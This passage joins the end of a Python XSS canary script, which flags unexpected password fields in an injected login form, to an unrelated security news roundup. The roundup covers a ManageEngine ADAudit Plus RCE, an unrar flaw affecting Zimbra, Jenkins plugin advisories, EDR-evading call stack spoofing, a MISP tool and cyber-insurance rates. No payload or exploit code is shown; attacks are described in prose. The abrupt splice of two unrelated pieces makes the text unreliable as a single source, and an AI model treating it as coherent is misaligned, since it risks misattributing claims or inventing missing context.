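if __name__ == "__main__":
    print("unsafe:", unexpected_password_fields(render_unsafe(INJECTED_FORM)))
    print("safe:  ", unexpected_password_fields(render_safe(INJECTED_FORM)))
```

The canary check is a detection aid, not a fix: the only real remedy is removing the XSS, because `autocomplete="off"` is ignored for login fields by most browsers and a CSP `form-action` directive does not stop a script from reading a field that was autofilled in place.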

Zoho ManageEngine vulnerability report

Horizon3 researchers have published a report on CVE-2022-28219, an unauthenticated remote code execution vulnerability affecting Zoho ManageEngine ADAudit Plus, a compliance tool used by enterprises to monitor changes to Active Directory. The vulnerability allows attackers to take over ManageEngine systems and then the local network by compromising domain admin accounts.

Unrar vulnerability in Zimbra

SonarSource researchers have discovered a vulnerability in the unrar utility, which the Zimbra collaboration suite uses to scan incoming RAR attachments, and which could be exploited to take over Zimbra instances.

Jenkins plugin vulnerabilities

The Jenkins project has published a security advisory warning about vulnerabilities in 25 plugins.

Call stack spoofing

F-Secure’s William Burgess has published a technical write-up on a technique named call stack spoofing that can be used to confuse EDR products and hide malicious operations.

New tool

eCrimeLabs has released and open-sourced a new tool called the MISP Purge Events tool. The name is self-explanatory.

Cyber insurance state

After a series of costly cyber-attacks have led to a spike in cyber-insurance rates, insurance broker Marsh said in a report released this week that rates are now stabilized again. [More on The Record]
